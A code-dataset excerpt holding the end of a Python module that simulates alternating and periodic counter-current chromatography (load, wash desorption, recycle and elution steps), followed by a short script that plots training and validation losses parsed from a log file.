"cycle_start_t_list",
cycle_start_t_list)
def _prepare_simulation(self):
"""Prepare everything before cycle-by-cycle simulation."""
self._assert_non_binding_species()
self._calc_load_f()
self._calc_cv() # might depend on load_f
self._report_column_dimensions() # optional
# Equilibration.
self._calc_equilibration_t()
# Wash.
self._calc_wash_t_and_f()
# Elution.
self._calc_elution_t_and_f()
self._calc_elution_peak_t()
self._update_elution_peak_pdf()
self._calc_elution_peak_cut_i_start_and_i_end()
self._calc_elution_peak_mask()
# Regeneration.
self._calc_regeneration_t()
# Prepare for estimation of cycle length.
self._update_load_btc()
if self.load_recycle:
self._update_load_recycle_pdf(self._wash_f)
if self.wash_recycle:
self._calc_load_recycle_wash_i()
# Cycle time.
self._calc_cycle_t()
if self.load_extend_first_cycle:
self._calc_first_cycle_extension_t()
# Cycle start positions == column load switch time points.
self._calc_cycle_start_i_list()
# Make sure cycle duration is long enough.
_t_cycle_except_load = self._equilibration_t + self._wash_t \
+ self._elution_t + self._regeneration_t
if self._cycle_t < _t_cycle_except_load:
self.log.e(f"Load step ({self._cycle_t}) should not be shorter"
f" than eq_t + wash_t + elution_t + regeneration_t"
f" ({_t_cycle_except_load: .6})!")
def _sim_c_load_binding(self,
f_load: _np.ndarray,
c_load: _np.ndarray
) -> _typing.Tuple[_np.ndarray, _np.ndarray]:
"""Determine what part of load binds.
Load in this context might also contain wash and load recycle
from previous steps.
Parameters
----------
f_load
Load flow rate profile.
c_load
Load concentration profile.
Returns
-------
c_bound
Conc profile of bound material.
c_unbound
Conc profile of unbound material = `c_load` - `c_bound`.
"""
assert f_load.size == c_load.shape[1], \
"f_load and c_load must have the same length"
assert c_load.shape[0] == \
self._n_species - len(self.non_binding_species), \
"c_load must contain all binding species"
c_bound = self.load_bt.calc_c_bound(f_load, c_load)
# Returns bound and unbound part.
return c_bound, c_load - c_bound
def _sim_c_wash_desorption(self,
f_load: _np.ndarray,
c_bound: _np.ndarray) -> _np.ndarray:
"""Get conc profile of desorbed material during wash step.
The step has no default logic.
Thus it raises `NotImplementedError` if called.
Parameters
----------
f_load
Flow rate profile during 'effective load' step.
The step includes wash recycle, load recycle and load step
as a column sees it in a single cycle.
c_bound
Conc profile of captured material.
Returns
-------
ndarray
Conc profile of desorbed material during wash step.
Raises
------
NotImplementedError
This method has no default implementation. Thus it being
called it will raise the error.
"""
# Not implemented in core this class, as there is
# no consensus on typical dynamics and the way to describe it.
raise NotImplementedError("Function not implemented in this class")
def _sim_c_recycle_propagation(
self,
f_unbound: _np.ndarray,
c_unbound: _np.ndarray,
c_wash_desorbed: _typing.Optional[_np.ndarray]
) -> _typing.Tuple[_np.ndarray, _np.ndarray]:
"""Propagate unbound and desorbed material through the column.
Unbound (breakthrough during load) and desorbed (during wash)
sections might have a different flow rates as they come from
different steps - load and wash.
Parameters
----------
f_unbound
Flow rate profile during 'total load' step for a cycle.
The step includes wash recycle, load recycle and load step.
c_unbound
Conc profile of overloaded material during load step
(plus previous wash and load recycle).
c_wash_desorbed
Conc profile of desorbed material during wash step.
Returns
-------
c_unbound_propagated
Propagated conc profile of overloaded material.
c_wash_desorbed_propagated
Propagated conc profile of desorbed material.
"""
assert hasattr(self, "_wash_f") and self._wash_f > 0
assert hasattr(self, "_wash_t") and self._wash_t > 0
assert self.load_recycle_pdf is not None
assert c_unbound.shape[0] == \
self._n_species - len(self.non_binding_species)
assert c_unbound.shape[1] == f_unbound.size
if c_wash_desorbed is None or c_wash_desorbed.size == 0:
c_wash_desorbed = _np.zeros([
self._n_species - len(self.non_binding_species),
int(round(self._wash_t / self._dt))])
else:
assert c_wash_desorbed.shape[0] == \
self._n_species - len(self.non_binding_species)
assert c_wash_desorbed.shape[1] == \
int(round(self._wash_t / self._dt))
# Combine on volumetric scale.
v_load = self._dt * f_unbound.cumsum()
v_wash = v_load[-1] + \
self._dt * _np.arange(1, c_wash_desorbed.shape[1] + 1) \
* self._wash_f
min_flow = min(f_unbound.min(), self._wash_f)
dv = min_flow * self._dt
v = _np.arange(dv,
(v_wash[-1] if v_wash.size > 0 else v_load[-1]) + dv,
dv)
c_v_combined = _interp.interp1d(
_np.concatenate((v_load, v_wash), axis=0),
_np.concatenate((c_unbound, c_wash_desorbed), axis=1),
fill_value="extrapolate"
)(v)
c_v_combined[c_v_combined < 0] = 0
# Simulate traveling of leftover material through the column.
self._update_load_recycle_pdf(min_flow)
c_v_combined_propagated = _utils.convolution.time_conv(
self._dt, c_v_combined, self._p_load_recycle_pdf)
# Split back on time scale.
c_combined_propagated = _interp.interp1d(
v,
c_v_combined_propagated,
fill_value="extrapolate"
)(_np.concatenate((v_load, v_wash), axis=0))
c_combined_propagated[c_combined_propagated < 0] = 0
c_unbound_propagated = c_combined_propagated[:, :v_load.size]
c_wash_desorbed_propagated = c_combined_propagated[:, v_load.size:]
return c_unbound_propagated, c_wash_desorbed_propagated
def _sim_c_elution_desorption(self,
m_bound: _np.ndarray
) -> _typing.Tuple[_np.ndarray,
_np.ndarray]:
"""Simulate elution step.
Parameters
----------
m_bound
Vector with amount of product being bound to the column.
`m_bound.size == n_species`
Returns
-------
c_elution
Outlet concentration profile during the elution.
b_elution_peak
Boolean vector. Peak is collected where the value is `True`.
"""
assert self._elution_f > 0
assert self._elution_t > 0
i_elution_duration = int(round(self._elution_t / self._dt))
# Multiply elution peak with the amount of captured product.
c_elution = \
self._p_elution_peak[_np.newaxis, :i_elution_duration] * \
m_bound[:, _np.newaxis] / self._elution_f
# Pad with zeros to cover the entire elution step duration.
if c_elution.shape[1] < i_elution_duration:
c_elution = _np.pad(c_elution,
((0, 0),
(0, i_elution_duration - c_elution.shape[1])),
mode="constant")
# Boolean mask - `True` where peak is being collected.
b_elution_peak = self._elution_peak_mask
return c_elution, b_elution_peak
def _sim_c_elution_buffer(self, n_time_steps: int) -> _np.ndarray:
"""Get elution buffer composition at the outlet of the column.
By default the buffer composition is constant throughout the
elution step.
Feel free to override this function if you want to simulate
linear gradient or if the transient phenomena at the beginning
of peak cut needs to be considered.
Parameters
----------
n_time_steps
Duration of elution step in number of time steps.
Returns
-------
ndarray
Buffer concentration profile at the outlet of the column
during the elution step.
"""
# Elution buffer composition.
elution_buffer_composition = \
self.elution_buffer_c.reshape(self.elution_buffer_c.size, 1)
assert elution_buffer_composition.size == 0 \
or elution_buffer_composition.size == self._n_species, \
f"Elution buffer composition must be either empty or have" \
f" a concentration value for each specie."
assert _np.all(elution_buffer_composition >= 0), \
"Concentration values in elution buffer must be >= 0"
if elution_buffer_composition.size == 0:
elution_buffer_composition = _np.zeros([self._n_species, 1])
self.log.i_data(self._log_tree,
"elution_buffer_composition",
elution_buffer_composition)
# Constant profile.
c_elution_buffer = elution_buffer_composition \
* _np.ones_like(self._t[:n_time_steps])
return c_elution_buffer
# noinspection PyMethodMayBeStatic,PyUnusedLocal
def _sim_c_regeneration(self,
m_bound: _np.ndarray
) -> _typing.Optional[_np.ndarray]:
"""Simulate regeneration step.
Parameters
----------
m_bound
Vector with amount of product being bound to the column at
the beginning of the regeneration step.
`m_bound.size == n_species`.
Returns
-------
Optional[ndarray]
Outlet concentration profile during regeneration step.
E.g. regeneration peak.
"""
# No default implementation.
c_regeneration = None
return c_regeneration
def _sim_c_out_cycle(self,
f_load: _np.ndarray,
c_load: _np.ndarray
) -> _typing.Tuple[_typing.Optional[_np.ndarray],
_typing.Optional[_np.ndarray],
_np.ndarray,
_np.ndarray,
_typing.Optional[_np.ndarray]]:
"""Simulates load-wash-elution-regeneration steps.
Regeneration is optional.
This function can be replaced in case user wants to use some
other variation of bind-elution dynamics.
Elution peak cut is applied in this function.
Elution peak shape must be defined by now.
Return profiles that are `None` are considered being zero.
Parameters
----------
f_load
Inlet (recycle + load) flow rate profile for a cycle.
The flow rate might be different during wash recycle.
c_load
Inlet (recycle + load) concentration profile.
Returns
-------
c_load
Conc profile at the outlet of the column during load.
c_wash
Conc profile at the outlet of the column during wash.
c_elution
Conc profile at the outlet of the column during elution.
b_elution
Boolean mask for elution step. `True` where peak is being
collected.
c_regeneration
Conc profile at the outlet of the column during
regeneration.
"""
assert self._load_f > 0
assert self._wash_f > 0
assert self._wash_t > 0
assert self._elution_f > 0
assert self._elution_t > 0
assert self._load_f > 0
assert self._cv > 0
# Evaluate binding.
c_bound, c_unbound = self._sim_c_load_binding(f_load, c_load)
# Log.
m_load = (c_load * f_load[_np.newaxis, :]).sum(1) * self._dt
m_bound = (c_bound * f_load[_np.newaxis, :]).sum(1) * self._dt
self.log.i_data(self._cycle_tree,
"column_utilization",
m_bound / self._cv / self.load_bt.get_total_bc())
self.log.i_data(self._cycle_tree, "m_load", m_load)
self.log.i_data(self._cycle_tree, "m_bound", m_bound)
self.log.i_data(self._cycle_tree, "m_unbound", m_load - m_bound)
self.log.d_data(self._cycle_tree, "f_load", f_load)
self.log.d_data(self._cycle_tree, "c_load", c_load)
self.log.d_data(self._cycle_tree, "c_bound", c_bound)
self.log.d_data(self._cycle_tree, "c_unbound", c_unbound)
# Evaluate desorption during wash.
c_wash_desorbed = None
if self.wash_desorption:
c_wash_desorbed = self._sim_c_wash_desorption(f_load, c_bound)
if c_wash_desorbed.size > 0:
# Subtract desorbed material from bound material.
m_bound -= c_wash_desorbed.sum(1)
# Log.
self.log.i_data(self._cycle_tree,
"m_wash_desorbed",
c_wash_desorbed.sum(1) * self._wash_f * self._dt)
self.log.d_data(self._cycle_tree,
"c_wash_desorbed",
c_wash_desorbed)
# Propagate unbound and desorbed material throughout the column.
c_out_load = c_unbound
c_out_wash = c_wash_desorbed
if self.load_recycle or self.wash_recycle:
c_out_load, c_out_wash = \
self._sim_c_recycle_propagation(f_load,
c_unbound,
c_wash_desorbed)
# Get elution peak.
c_out_elution, elution_peak_mask = \
self._sim_c_elution_desorption(m_bound)
# Log.
m_elution_peak = (c_out_elution * elution_peak_mask[_np.newaxis, :]
).sum(1) * self._elution_f * self._dt
m_elution = c_out_elution.sum(1) * self._elution_f * self._dt
self.log.i_data(self._cycle_tree,
"m_elution_peak", m_elution_peak)
self.log.i_data(self._cycle_tree,
"m_elution", m_elution)
self.log.i_data(self._cycle_tree,
"m_elution_peak_cut_loss", m_elution - m_elution_peak)
# Get regeneration peak.
c_out_regeneration = self._sim_c_regeneration(
m_bound - c_out_elution.sum(1) * self._elution_f * self._dt)
return c_out_load, c_out_wash, c_out_elution, \
elution_peak_mask, c_out_regeneration
def _calculate(self):
# Pre calculate parameters and repetitive profiles.
self._prepare_simulation()
# Assert proper list of binding species.
binding_species = [i for i in range(self._n_species)
if i not in self.non_binding_species]
assert len(binding_species) > 0
# Copy inlet vectors.
c_in_load = self._c[binding_species].copy()
f_in_load = self._f.copy()
f_in_i_end = min(_utils.vectors.true_end(f_in_load > 0), self._t.size)
c_in_load[:, f_in_i_end:] = 0
# Clear for results.
self._c[:] = 0
self._f[:] = 0
# Prepare logger.
log_data_cycles = list()
self.log.set_branch(self._log_tree, "cycles", log_data_cycles)
# Variable to store wash recycle to.
previous_c_bt_wash: _typing.Optional[_np.ndarray] = None
# Loop across cycles.
for i in range(self._cycle_start_i_list.size):
# Load-wash-elution-regeneration-equilibration steps for a column.
# Load step starts at `self._cycle_start_i_list[i]`.
# Prepare logger for this cycle.
self._cycle_tree = dict()
log_data_cycles.append(self._cycle_tree)
# Load start and end time as the column sees it.
if i > 0 and self.load_recycle:
# Column sees leftovers from previous load during recycling.
cycle_load_i_start = self._cycle_start_i_list[i - 1]
else:
cycle_load_i_start = self._cycle_start_i_list[i]
# Calc cycle end (either next cycle or end or simulation time).
if i + 1 < self._cycle_start_i_list.size:
cycle_load_i_end = self._cycle_start_i_list[i + 1]
else:
cycle_load_i_end = f_in_i_end - 1
# Log results.
self.log.i_data(self._cycle_tree,
"i_cycle_load_start",
cycle_load_i_start)
self.log.i_data(self._cycle_tree,
"i_cycle_load_step_start",
self._cycle_start_i_list[i])
self.log.i_data(self._cycle_tree,
"i_cycle_load_end",
cycle_load_i_end)
# Calc profiles at column outlet.
c_out_load, c_out_wash, c_out_elution, \
b_out_elution, c_out_regeneration = self._sim_c_out_cycle(
f_in_load[cycle_load_i_start:cycle_load_i_end],
c_in_load[:, cycle_load_i_start:cycle_load_i_end]
)
self.log.d_data(self._cycle_tree,
"c_out_load", c_out_load)
self.log.d_data(self._cycle_tree,
"c_out_wash", c_out_wash)
self.log.d_data(self._cycle_tree,
"c_out_elution", c_out_elution)
self.log.d_data(self._cycle_tree,
"b_out_elution", b_out_elution)
self.log.d_data(self._cycle_tree,
"c_out_regeneration", c_out_regeneration)
# Load recycle.
if self.load_recycle:
# Recycle load during the load step.
i_load_start_rel = self._cycle_start_i_list[i] \
- cycle_load_i_start
c_load_recycle = c_out_load[:, i_load_start_rel:]
c_in_load[:, self._cycle_start_i_list[i]:cycle_load_i_end] = \
c_load_recycle
self.log.i_data(self._cycle_tree, "m_load_recycle",
c_load_recycle.sum(1)
* self._load_f * self._dt)
self.log.d_data(self._cycle_tree, "c_load_recycle",
c_load_recycle)
# Losses during load == bt through 2nd column.
c_loss_bt_2nd_column = c_out_load[:, i_load_start_rel]
self.log.i_data(self._cycle_tree, "m_loss_bt_2nd_column",
c_loss_bt_2nd_column.sum()
* self._dt * self._load_f)
self.log.d_data(self._cycle_tree, "c_loss_bt_2nd_column",
c_loss_bt_2nd_column)
else:
# report losses during load
m_loss_load = c_out_load.sum() * self._dt * self._load_f
self.log.i_data(self._cycle_tree, "m_loss_load", m_loss_load)
# Wash recycle.
if self.wash_recycle:
if previous_c_bt_wash is not None \
and previous_c_bt_wash.size > 0:
# Clip wash recycle duration if needed.
i_wash_duration = min(
self._wash_recycle_i_duration,
self._t.size - self._cycle_start_i_list[i])
# Log losses due to discarding load bt during wash recycle.
s = c_in_load[
:,
self._cycle_start_i_list[i]:self._cycle_start_i_list[i]
+ i_wash_duration]
self.log.i_data(self._cycle_tree,
"m_loss_load_bt_during_wash_recycle",
s.sum() * self._dt * self._load_f)
self.log.d_data(self._cycle_tree,
"c_lost_load_during_wash_recycle", s)
self.log.d_data(self._cycle_tree, "c_wash_recycle",
previous_c_bt_wash[:, :i_wash_duration])
self.log.i_data(
self._cycle_tree, "m_wash_recycle",
previous_c_bt_wash[:, :i_wash_duration].sum(1)
* self._dt * self._wash_f)
# Apply previous wash recycle onto the inlet profile.
s[:] = previous_c_bt_wash[:, :i_wash_duration]
f_in_load[self._cycle_start_i_list[i]:
self._cycle_start_i_list[i]
+ i_wash_duration] = self._wash_f
# Save wash from this cycle to be used during the next cycle.
previous_c_bt_wash = c_out_wash
else:
# Report losses during wash.
if c_out_wash is None:
c_out_wash = _np.zeros(
[len(binding_species),
int(round(self._wash_t / self._dt))])
m_loss_wash = c_out_wash.sum() * self._dt * self._load_f
self.log.i_data(self._cycle_tree, "m_loss_wash", m_loss_wash)
# Elution.
[i_el_rel_start, i_el_rel_end] = \
_utils.vectors.true_start_and_end(b_out_elution)
i_el_start = min(
self._t.size,
cycle_load_i_end + c_out_wash.shape[1] + i_el_rel_start)
i_el_end = min(
self._t.size,
cycle_load_i_end + c_out_wash.shape[1] + i_el_rel_end)
i_el_rel_end = i_el_rel_start + i_el_end - i_el_start
# Log.
self.log.i_data(self._cycle_tree, "i_elution_start", i_el_start)
self.log.i_data(self._cycle_tree, "i_elution_end", i_el_end)
# Write to global outlet.
self._f[i_el_start:i_el_end] = self._elution_f
self._c[binding_species, i_el_start:i_el_end] = \
c_out_elution[:, i_el_rel_start:i_el_rel_end]
class ACC(AlternatingChromatography):
"""Alternating column chromatography without recycling.
Alternating load-bind-elution twin-column chromatography without
recycling of overloaded or washed out material.
This class offers no dynamics for desorption during wash step.
Parameters
----------
t
Simulation time vector.
Starts with 0 and has a constant time step.
uo_id
Unique identifier.
load_bt
Load breakthrough logic.
peak_shape_pdf
Elution peak shape.
gui_title
Readable title for GUI. Default = "ACC".
Notes
-----
For list of attributes refer to :class:`AlternatingChromatography`.
See Also
--------
:class:`AlternatingChromatography`
Examples
--------
>>> dt = 0.5 # min
>>> t = _np.arange(0, 24.1 * 60, dt)
>>> load_bt = _bt_load.ConstantPatternSolution(dt, dbc_100=50, k=0.12)
>>> peak_shape_pdf = _pdf.ExpModGaussianFixedRelativeWidth(t, 0.15, 0.3)
>>> acc_pro_a = ACC(
... t,
... load_bt=load_bt,
... peak_shape_pdf=peak_shape_pdf,
... uo_id="pro_a_acc",
... gui_title="ProteinA ACC",
... )
>>> acc_pro_a.cv = 100 # mL
>>> # Equilibration step.
>>> acc_pro_a.equilibration_cv = 1.5
>>> # Equilibration flow rate is same as load flow rate.
>>> acc_pro_a.equilibration_f_rel = 1
>>> # Load 10 CVs.
>>> acc_pro_a.load_cv = 20
>>> # Define wash step.
>>> acc_pro_a.wash_cv = 5
>>> # Elution step.
>>> acc_pro_a.elution_cv = 3
>>> # 1st momentum of elution peak from data from above.
>>> acc_pro_a.elution_peak_position_cv = 1.2
>>> acc_pro_a.elution_peak_cut_start_c_rel_to_peak_max = 0.05
>>> acc_pro_a.elution_peak_cut_end_c_rel_to_peak_max = 0.05
>>> # Regeneration step.
>>> acc_pro_a.regeneration_cv = 1.5
>>> # Inlet flow rate profile.
>>> f_in = _np.ones_like(t) * 15 # mL/min
>>> c_in = _np.ones([1, t.size]) * 2.5 # mg/mL
>>> # Simulate ACC.
>>> f_out, c_out = acc_pro_a.evaluate(f_in, c_in)
"""
def __init__(self,
t: _np.ndarray,
uo_id: str,
load_bt: _core.ChromatographyLoadBreakthrough,
peak_shape_pdf: _core.PDF,
gui_title: str = "ACC"):
super().__init__(t, uo_id, load_bt, peak_shape_pdf, gui_title)
def _sim_c_wash_desorption(self,
f_load: _np.ndarray,
c_bound: _np.ndarray) -> _np.ndarray:
"""Desorbed material during wash step is not supported by ACC.
Raises
------
NotImplementedError
Raises exception when function if called.
"""
raise NotImplementedError("Function not implemented in this class.")
class PCC(AlternatingChromatography):
"""Alternating column chromatography with recycling of load.
Alternating load-bind-elution twin-column chromatography with
optional recycling of overloaded or washed out material.
This class offers no dynamics for desorption during wash step.
PCC uses :attr:`load_bt` to determine what parts of the load (and
recycled material) bind to the column. The unbound (not captured)
part is propagated through the column by :attr:`load_recycle_pdf`.
Void volume for :attr:`load_recycle_pdf` is defined as
:attr:`column_porosity_retentate` * `column volume`.
Parameters
----------
t
Simulation time vector.
Starts with 0 and has a constant time step.
uo_id
Unique identifier.
load_bt
Load breakthrough logic.
load_recycle_pdf
Propagation of load breakthrough and/or washed out material
through the column.
column_porosity_retentate
Porosity of the column for binding species (protein).
peak_shape_pdf
Elution peak shape.
gui_title
Readable title for GUI. Default = "PCC".
Notes
-----
For list of additional attributes refer to
:class:`AlternatingChromatography`.
See Also
--------
:class:`AlternatingChromatography`
Examples
--------
>>> dt = 0.5 # min
>>> t = _np.arange(0, 24.1 * 60, dt)
>>> load_bt = _bt_load.ConstantPatternSolution(dt, dbc_100=50, k=0.12)
>>> peak_shape_pdf = _pdf.ExpModGaussianFixedRelativeWidth(t, 0.15, 0.3)
>>> load_recycle_pdf = _pdf.GaussianFixedDispersion(t, 2 * 2 / 30)
>>> pcc_pro_a = PCC(
... t,
... load_bt=load_bt,
... peak_shape_pdf=peak_shape_pdf,
... load_recycle_pdf=load_recycle_pdf,
... # Porosity of the column for protein.
... column_porosity_retentate=0.64,
... uo_id="pro_a_pcc",
... gui_title="ProteinA PCC",
... )
>>> pcc_pro_a.cv = 100 # mL
>>> # Equilibration step.
>>> pcc_pro_a.equilibration_cv = 1.5
>>> # Equilibration flow rate is same as load flow rate.
>>> pcc_pro_a.equilibration_f_rel = 1
>>> # Load until 70 % breakthrough.
>>> pcc_pro_a.load_c_end_relative_ss = 0.7
>>> # Automatically prolong first cycle to faster achieve a steady-state.
>>> pcc_pro_a.load_extend_first_cycle = True
>>> # Define wash step.
>>> # There is no desorption during wash step in this example.
>>> pcc_pro_a.wash_cv = 5
>>> pcc_pro_a.wash_recycle = True
>>> pcc_pro_a.wash_recycle_duration_cv = 2
>>> # Elution step.
>>> pcc_pro_a.elution_cv = 3
>>> # 1st momentum of elution peak from data from above.
>>> pcc_pro_a.elution_peak_position_cv = 1.2
>>> pcc_pro_a.elution_peak_cut_start_c_rel_to_peak_max = 0.05
>>> pcc_pro_a.elution_peak_cut_end_c_rel_to_peak_max = 0.05
>>> # Regeneration step.
>>> pcc_pro_a.regeneration_cv = 1.5
>>> # Inlet flow rate profile.
>>> f_in = _np.ones_like(t) * 15 # mL/min
>>> c_in = _np.ones([1, t.size]) * 2.5 # mg/mL
>>> # Simulate ACC.
>>> f_out, c_out = pcc_pro_a.evaluate(f_in, c_in) # doctest: +ELLIPSIS
pro_a_pcc: Steady-state concentration is being estimated ...
pro_a_pcc: Steady-state concentration is being estimated ...
"""
def __init__(self,
t: _np.ndarray,
uo_id: str,
load_bt: _core.ChromatographyLoadBreakthrough,
load_recycle_pdf: _core.PDF,
column_porosity_retentate: float,
peak_shape_pdf: _core.PDF,
gui_title: str = "PCC"):
super().__init__(t, uo_id, load_bt, peak_shape_pdf, gui_title)
self.load_recycle = True
"""Recycle load breakthrough. Default = `True`."""
self.wash_recycle = False
"""Recycle wash. Default = False."""
self.column_porosity_retentate = column_porosity_retentate
"""Column porosity for binding species.
See Also
--------
:class:`PCC`
Examples
--------
`column_porosity_retentate` is a mean residence time of the
product (protein) traveling through the column during
non-binding conditions (in CVs).
"""
self.load_recycle_pdf = load_recycle_pdf
"""PDF of wash and/or unbound load traveling through the column.
See Also
--------
:class:`PCC`
"""
def _sim_c_wash_desorption(self,
f_load: _np.ndarray,
c_bound: _np.ndarray) -> _np.ndarray:
"""Desorbed material during wash step is not supported by PCC.
Raises
------
NotImplementedError
Raises exception when function if called.
"""
raise NotImplementedError("Function not implemented in this class.")
class PCCWithWashDesorption(PCC):
"""Alternating column chromatography with recycling of load.
Alternating load-bind-elution twin-column chromatography with
optional recycling of overloaded or washed out material.
The material desorption during wash step is defined by exponential
half life time
* :attr:`wash_desorption_tail_half_time_cv`
and the amount of desorbable material which is defined by
* :attr:`wash_desorption_desorbable_material_share` or
* :attr:`wash_desorption_desorbable_above_dbc`.
PCC uses :attr:`load_bt` to determine what parts of the load (and
recycled material) bind to the column.
The unbound (not captured) part and desorbed part are propagated
through the column by :attr:`load_recycle_pdf`.
Void volume for :attr:`load_recycle_pdf` is defined as
:attr:`column_porosity_retentate` * `column volume`.
Parameters
----------
t
Simulation time vector.
Starts with 0 and has a constant time step.
uo_id
Unique identifier.
load_bt
Load breakthrough logic.
load_recycle_pdf
Propagation of load breakthrough and/or washed out material
through the column.
column_porosity_retentate
Porosity of the column for binding species (protein).
peak_shape_pdf
Elution peak shape.
gui_title
Readable title for GUI. Default = "PCCWithWashDesorption".
Notes
-----
During wash step, weaker binding isoforms might be desorbed and
recycled. In turn they are again desorbed and recycled during next
cycle and so on; resulting in increasing amount of desorbed material
during wash step (even in steady-state). This is not considered by
this class. Furthermore, it is not a favorable case in terms of RTD
as the weakly bound material propagates from column to column for
many cycles.
For list of additional attributes refer to
:class:`PCC` and :class:`AlternatingChromatography`.
See Also
--------
:class:`PCC`
:class:`AlternatingChromatography`
"""
def __init__(self,
t: _np.ndarray,
uo_id: str,
load_bt: _core.ChromatographyLoadBreakthrough,
load_recycle_pdf: _core.PDF,
column_porosity_retentate: float,
peak_shape_pdf: _core.PDF,
gui_title: str = "PCCWithWashDesorption"):
super().__init__(t, uo_id, load_bt, load_recycle_pdf,
column_porosity_retentate, peak_shape_pdf, gui_title)
self.load_recycle = True
"""Recycle load breakthrough. Default = `True`."""
self.wash_recycle = True
"""Recycle wash. Default = `True`."""
self.wash_desorption = True
"""Simulate desorption during wash step. Default = `True`."""
self.wash_desorption_tail_half_time_cv = -1
"""Wash desorption rate.
Required if :attr:`wash_desorption` is `True`.
Wash desorption is simulated as exponential decay with half-life
:attr:`wash_desorption_tail_half_time_cv`.
"""
self.wash_desorption_desorbable_material_share = -1
"""Share of material that can be desorbed during wash step.
Wash desorption is simulated as exponential decay. Only part of
adsorbed material is subjected to that exponential decay. That
part can be defined by:
* :attr:`wash_desorption_desorbable_material_share` (this one)
or
* :attr:`wash_desorption_desorbable_above_dbc`.
"""
self.wash_desorption_desorbable_above_dbc = -1
"""Share of material that can be desorbed during wash step.
Share is defined as a share of material loaded onto the column
that exceeds specified `wash_desorption_desorbable_above_dbc`
binding capacity.
Wash desorption is simulated as exponential decay. Only part of
adsorbed material is subjected to that exponential decay. That
part can be defined by:
* :attr:`wash_desorption_desorbable_material_share` (this one)
or
* :attr:`wash_desorption_desorbable_above_dbc`.
"""
def _sim_c_wash_desorption(self,
f_load: _np.ndarray,
c_bound: _np.ndarray) -> _np.ndarray:
"""Get conc profile of desorbed material during wash step.
`self.wash_desorption_tail_half_time_cv` needs to be defined.
One of `self.wash_desorption_desorbable_material_share` and
`self.wash_desorption_desorbable_above_dbc` needs to be defined.
Parameters
----------
f_load
Flow rate profile during 'effective load' step.
The step includes wash recycle, load recycle and load step
as a column sees it in a single cycle.
c_bound
Conc profile of captured material.
Returns
-------
ndarray
Conc profile of desorbed material during wash step.
"""
assert self.wash_desorption_tail_half_time_cv > 0
assert self._load_f > 0
assert self._wash_f > 0
assert self._wash_t > 0
assert self._cv > 0
assert self.wash_desorption_desorbable_material_share > 0 \
or self.wash_desorption_desorbable_above_dbc > 0
assert f_load.size == c_bound.shape[1]
assert c_bound.shape[0] \
== self._n_species - len(self.non_binding_species)
m_bound = (c_bound * f_load[_np.newaxis, :]).sum(1)[:, _np.newaxis] \
* self._dt
# Calc share of desorbable material.
k = -1
if self.wash_desorption_desorbable_material_share > 0:
k = self.wash_desorption_desorbable_material_share
if self.wash_desorption_desorbable_above_dbc > 0:
if k > 0:
self.log.w(
f"Share of desorbable material defined twice!!"
f" Using `load_recycle_wash_desorbable_material_share`")
else:
k = max(0,
1 - self.wash_desorption_desorbable_above_dbc
* self._cv / m_bound.sum())
assert 1 >= k >= 0, f"Share of desorbable material {k}" \
f" must be >= 0 and <= 1."
i_wash_duration = int(round(self._wash_t / self._dt))
# Generate exponential tail.
exp_pdf = _pdf.TanksInSeries(self._t[:i_wash_duration],
n_tanks=1,
pdf_id=f"wash_desorption_exp_drop")
exp_pdf.allow_open_end = True
exp_pdf.trim_and_normalize = False
tau = self.wash_desorption_tail_half_time_cv \
* self._cv / self._wash_f / _np.log(2)
exp_pdf.update_pdf(rt_mean=tau)
p = exp_pdf.get_p()[_np.newaxis, :i_wash_duration]
# Scale desorbed material conc due to differences in flow rate.
c_desorbed = m_bound * k * p / self._wash_f
# Pad with zeros if needed.
c_desorbed = _np.pad(c_desorbed,
((0, 0),
(0, i_wash_duration - c_desorbed.shape[1])),
mode="constant")
# Log.
self.log.d_data(self._cycle_tree if hasattr(self, "_cycle_tree")
else self._log_tree,
"p_desorbed",
p)
return c_desorbed
| 39.595407 | 79 | 0.571891 | 94,315 | 0.994559 | 0 | 0 | 706 | 0.007445 | 0 | 0 | 45,172 | 0.476342 |
905ba6022a4c26013aa2a89c33571a5f24d93f3a | 1,640 | py | Python | src/tools/create_graphs_log.py | KatiaJDL/CenterPoly | 42811d9f5f85d9fef91a03275fe6ad113ccb163c | [
"MIT"
]
| null | null | null | src/tools/create_graphs_log.py | KatiaJDL/CenterPoly | 42811d9f5f85d9fef91a03275fe6ad113ccb163c | [
"MIT"
]
| null | null | null | src/tools/create_graphs_log.py | KatiaJDL/CenterPoly | 42811d9f5f85d9fef91a03275fe6ad113ccb163c | [
"MIT"
]
| null | null | null | import matplotlib.pyplot as plt
def main():
with open('log.txt') as f:
lines = f.readlines()
glob_loss = []
hm_l = []
off_l = []
poly_l = []
depth_l = []
glob_loss_val = []
hm_l_val = []
off_l_val = []
poly_l_val = []
depth_l_val = []
for epoch in lines:
m = epoch.split("|")
if m[0].split(':')[1] == ' AP':
glob_loss_val.append(float(m[1][5:-1]))
hm_l_val.append(float(m[2][5:-1]))
off_l_val.append(float(m[3][6:-1]))
poly_l_val.append(float(m[4][7:-1]))
depth_l_val.append(float(m[5][8:-1]))
else:
nb_epoch = int(m[0].split(":")[-1])
glob_loss.append(float(m[1][5:-1]))
hm_l.append(float(m[2][5:-1]))
off_l.append(float(m[3][6:-1]))
poly_l.append(float(m[4][7:-1]))
depth_l.append(float(m[5][8:-1]))
if len(m) > 8 :
glob_loss_val.append(float(m[7][5:-1]))
hm_l_val.append(float(m[8][5:-1]))
off_l_val.append(float(m[9][6:-1]))
poly_l_val.append(float(m[10][7:-1]))
depth_l_val.append(float(m[11][8:-1]))
plt.plot(glob_loss, label = "glob_loss")
plt.plot(hm_l, label = "hm_l")
plt.plot(off_l, label = "off_l")
plt.plot(poly_l, label = "poly_l")
plt.plot(depth_l, label = "depth_l")
plt.legend()
plt.savefig("loss_train.png")
plt.show()
plt.plot(glob_loss_val, label = "glob_loss_val")
plt.plot(hm_l_val, label = "hm_l_val")
plt.plot(off_l_val, label = "off_l_val")
plt.plot(poly_l_val, label = "poly_l_val")
plt.plot(depth_l_val, label = "depth_l_val")
plt.legend()
plt.savefig("loss_valid.png")
plt.show()
if __name__ == '__main__':
main()
| 24.848485 | 50 | 0.585366 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 167 | 0.101829 |
905cb03976073d3a05d5e9b6aad19e20554ed770 | 551 | py | Python | fluree/query-generate.py | ivankoster/aioflureedb | d421391a7db1d2acaf8d39f6dfe2997e8097ade8 | [
"BSD-3-Clause"
]
| 4 | 2020-09-09T14:58:10.000Z | 2021-12-04T14:11:44.000Z | fluree/query-generate.py | ivankoster/aioflureedb | d421391a7db1d2acaf8d39f6dfe2997e8097ade8 | [
"BSD-3-Clause"
]
